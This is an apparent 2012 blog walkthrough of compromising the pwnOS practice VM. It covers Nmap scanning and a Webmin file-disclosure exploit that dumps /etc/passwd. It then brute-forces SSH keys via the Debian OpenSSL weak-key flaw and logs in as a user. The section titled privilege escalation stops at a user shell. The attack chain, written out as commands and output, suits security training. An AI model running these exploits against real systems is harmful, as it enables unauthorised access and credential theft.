Comments

Pages

Friday 14 September 2012

Privilege Escalation PwnOS

Posted by at 07:46 Read our previous post
Before doing an attack, we need to run some job (hacking framework).

  1.  Information Gathering 
    In this section I will collecting some information from target using Nmap.
    root@bt:~# nmap -sS -A -p10-10000 192.168.56.101
    
    Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-09-14 10:46 WIT
    Nmap scan report for 192.168.56.101
    Host is up (0.00083s latency).
    Not shown: 9986 closed ports
    PORT      STATE SERVICE     VERSION
    22/tcp    open  ssh         OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)
    | ssh-hostkey: 1024 e4:46:40:bf:e6:29:ac:c6:00:e2:b2:a3:e1:50:90:3c (DSA)
    |_2048 10:cc:35:45:8e:f2:7a:a1:cc:db:a0:e8:bf:c7:73:3d (RSA)
    80/tcp    open  http        Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
    |_http-title: Site doesn't have a title (text/html).
    |_http-methods: No Allow or Public header in OPTIONS response (status code 200)
    139/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: MSHOME)
    445/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: MSHOME)
    10000/tcp open  http        MiniServ 0.01 (Webmin httpd)
    |_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
    |_http-methods: No Allow or Public header in OPTIONS response (status code 200)
    MAC Address: 08:00:27:42:D9:A7 (Cadmus Computer Systems)
    Device type: general purpose
    Running: Linux 2.6.X
    OS CPE: cpe:/o:linux:kernel:2.6.22
    OS details: Linux 2.6.22 (embedded, ARM)
    Network Distance: 1 hop
    Service Info: OS: Linux; CPE: cpe:/o:linux:kernel
    
    Host script results:
    |_nbstat: NetBIOS name: UBUNTUVM, NetBIOS user: , NetBIOS MAC: 
    | smb-security-mode: 
    |   Account that was used for smb scripts: guest
    |   User-level authentication
    |   SMB Security: Challenge/response passwords supported
    |_  Message signing disabled (dangerous, but default)
    |_smbv2-enabled: Server doesn't support SMBv2 protocol
    | smb-os-discovery: 
    |   OS: Unix (Samba 3.0.26a)
    |   Computer name: ubuntuvm
    |   Domain name: nsdlab
    |   FQDN: ubuntuvm.NSDLAB
    |   NetBIOS computer name: 
    |_  System time: 2012-09-14 10:46:59 UTC-5
    
    TRACEROUTE
    HOP RTT     ADDRESS
    1   0.83 ms 192.168.56.101
    
    OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 25.11 seconds
    
  2.  Service Enumeration 
    From the first section, We will procced to the Service Enumeration
    PORT      STATE SERVICE     VERSION
    22/tcp    open  ssh         OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)
    | ssh-hostkey: 1024 e4:46:40:bf:e6:29:ac:c6:00:e2:b2:a3:e1:50:90:3c (DSA)
    |_2048 10:cc:35:45:8e:f2:7a:a1:cc:db:a0:e8:bf:c7:73:3d (RSA)
    80/tcp    open  http        Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
    |_http-title: Site doesn't have a title (text/html).
    |_http-methods: No Allow or Public header in OPTIONS response (status code 200)
    139/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: MSHOME)
    445/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: MSHOME)
    10000/tcp open  http        MiniServ 0.01 (Webmin httpd)
    
    
  3.  Vulnerability Assesment 
    I will using Nessus for this procces. Open your Nessus and scan your target.

    from Nessus scan results, seen a lot of vulnerability in there. You can choose one by one as needed.
    We can look from the result that webmin has a bug Arbitary File Disclosure. So I will getting information for username and password.
  4.  Exploitation 
    From the result of nessus, I will use 2 bugs here, OpenSSL and Webmin.
    Go to your exploitdb and search exploit for openssl and webmin.
    First, I want to try webmin bugs and download /etc/passwd and /etc/shadow

    root@bt:~# cd /pentest/exploits/exploitdb/
    root@bt:/pentest/exploits/exploitdb# ./searchsploit webmin                                                                                 
     Description                                                                 Path                                                          
    ------------------------------
    Webmin BruteForce and Command Execution Exploit                             /multiple/remote/705.pl
    Webmin Web Brute Force v1.5 (cgi-version)                                   /multiple/remote/745.cgi
    Webmin BruteForce + Command Execution v1.5                                  /multiple/remote/746.pl
    Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit          /multiple/remote/1997.php
    Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit (perl)   /multiple/remote/2017.pl
    phpMyWebmin 1.0 (window.php) Remote File Include Vulnerability              /php/webapps/2451.txt
    phpMyWebmin 1.0 (window.php) Remote File Include Vulnerability              /php/webapps/2451.txt
    phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities             /php/webapps/2462.txt
    phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities             /php/webapps/2462.txt
    phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities             /php/webapps/2462.txt
    Webmin 0.91 Directory Traversal Vulnerability                               /cgi/remote/21183.txt
    root@bt:/pentest/exploits/exploitdb# perl platforms/multiple/remote/2017.pl 192.168.56.101 10000 /etc/passwd 0
    WEBMIN EXPLOIT !!!!! coded by UmZ!
    Comments and Suggestions are welcome at umz32.dll [at] gmail.com
    Vulnerability disclose at securitydot.net
    I am just coding it in perl 'cuz I hate PHP!
    Attacking 192.168.56.101 on port 10000!
    FILENAME:  /etc/passwd
    
     FILE CONTENT STARTED
     -----------------------------------
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/bin/sh
    bin:x:2:2:bin:/bin:/bin/sh
    sys:x:3:3:sys:/dev:/bin/sh
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/bin/sh
    man:x:6:12:man:/var/cache/man:/bin/sh
    lp:x:7:7:lp:/var/spool/lpd:/bin/sh
    mail:x:8:8:mail:/var/mail:/bin/sh
    news:x:9:9:news:/var/spool/news:/bin/sh
    uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
    proxy:x:13:13:proxy:/bin:/bin/sh
    www-data:x:33:33:www-data:/var/www:/bin/sh
    backup:x:34:34:backup:/var/backups:/bin/sh
    list:x:38:38:Mailing List Manager:/var/list:/bin/sh
    irc:x:39:39:ircd:/var/run/ircd:/bin/sh
    gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
    nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
    dhcp:x:100:101::/nonexistent:/bin/false
    syslog:x:101:102::/home/syslog:/bin/false
    klog:x:102:103::/home/klog:/bin/false
    mysql:x:103:107:MySQL Server,,,:/var/lib/mysql:/bin/false
    sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
    vmware:x:1000:1000:vmware,,,:/home/vmware:/bin/bash
    obama:x:1001:1001::/home/obama:/bin/bash
    osama:x:1002:1002::/home/osama:/bin/bash
    yomama:x:1003:1003::/home/yomama:/bin/bash
    biasa:x:1004:1004:,,,:/home/biasa:/bin/bash
    -------------------------------------
    
    Now, we know information about username.
    Next I will getting access with available username. We still leaves one bug from nessus scanning. Opens SSL, ok let search the exploit from exploit db.

    root@bt# cd /pentest/exploits/exploitdb/
    root@bt# ./searchsploit openssl
    
     Description                                                                 Path
    --------------------------------------------------------------------------- -------------------------
    Brute forcer for OpenSSL ASN.1 parsing bugs (<=0.9.6j <=0.9.7b)             /multiple/dos/146.c
    Apache OpenSSL Remote Exploit (Multiple Targets) (OpenFuckV2.c)             /linux/remote/764.c
    OpenSSL < 0.9.7l / 0.9.8d SSLv2 Client Crash Exploit                        /multiple/dos/4773.pl
    Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit                      /multiple/remote/5622.txt
    Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit (ruby)               /multiple/remote/5632.rb
    Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit (Python)             /linux/remote/5720.py
    OpenSSL <= 0.9.8k                                                           /multiple/dos/8720.c
    OpenSSL < 0.9.8i DTLS ChangeCipherSpec Remote DoS Exploit                   /multiple/dos/8873.c
    OpenSSL remote DoS                                                          /linux/dos/12334.c
    OpenSSL ASN1 BIO Memory Corruption Vulnerability                            /multiple/dos/18756.txt
    OpenSSL ASN1 BIO Memory Corruption Vulnerability                            /multiple/dos/18756.txt
    PHP 6.0 openssl_verify() Local Buffer Overflow PoC                          /windows/dos/19963.txt
    
    Before running the exploit, we need ssh rsa keys for debian open ssl.
    Please download here http://digitaloffense.net/tools/debian-openssl/debian_ssh_rsa_2048_x86.tar.bz2.
    Extract the ssh rsa, now time for run the exploit.
    root@bt# ruby /pentest/exploits/exploitdb/platforms/multiple/remote/5632.rb 192.168.56.101 vmware /home/biasa/viz/rsa/2048
    testing key 2/32768 /home/biasa/viz/rsa/2048/e04baf9d04ca7cd565d71880de75c58e-29931...
    testing key 3/32768 /home/biasa/viz/rsa/2048/2411614d9fe125cbb7f5b8f13fa1c0a0-18050...
    .......cut.......
    testing key 21377/32768 /home/biasa/viz/rsa/2048/70f4f5c0201d70a8e765bdc4a492d1da-15597...
    testing key 21378/32768 /home/biasa/viz/rsa/2048/f0d557e76c4e6380d81d49262dd7cb63-27526...
    KEYFILE FOUND: 
    /home/biasa/viz/rsa/2048/d8629ce6dc8f2492e1454c13f46adb26-4566
    Gotcha, we got the rsa key. Try the ssh rsa, but make sure that the permission is 755.
  5.  Privillege Escalation 
    Lets connecting using ssh

    root@bt:/pentest/exploits/exploitdb# ssh -i /home/biasa/viz/rsa/2048/d8629ce6dc8f2492e1454c13f46adb26-4566 vmware@192.168.56.101
    Linux ubuntuvm 2.6.22-14-server #1 SMP Sun Oct 14 23:34:23 GMT 2007 i686
    
    The programs included with the Ubuntu system are free software;
    the exact distribution terms for each program are described in the
    individual files in /usr/share/doc/*/copyright.
    
    Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
    applicable law.
    Last login: Thu Sep 13 10:31:22 2012 from 192.168.56.1
    vmware@ubuntuvm:~$ 
    Ok we got the access.

No comments:

Post a Comment

©2012 SECURITY is powered by Blogger - Template designed by Stramaxon - Best SEO Template